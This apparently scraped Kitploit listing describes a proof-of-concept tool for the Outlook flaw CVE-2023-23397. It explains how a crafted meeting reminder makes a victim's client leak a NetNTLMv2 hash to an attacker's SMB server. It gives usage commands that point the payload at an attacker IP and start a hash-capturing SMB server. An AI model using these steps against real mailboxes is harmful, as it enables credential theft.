Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-23397 — Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email. | Kitploit
Tools/GitHubGitHub/trackflaw/cve-2023-23397
Phishing ToolsPassword AttacksPayload GenerationVulnerability AnalysisExploitationEmail Security
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.

View Repository
132283 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-23397

Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.

Description

Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).

An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox.

What does the poc do?

  1. Generated .msg payload.
  2. Send it by email with custom SMTP server.

Usage

In one session :

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

In a second session (smbserver or responder as you want).

root@kitploit:~
smbserver.py -smb2support SHARE .

Demo (manual poc)

poc

Explanatory video (french speaking)

RÉCUPÉRER des mots de passe avec Microsoft OUTLOOK #CVE-2023-23397

Original article

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

Download Tool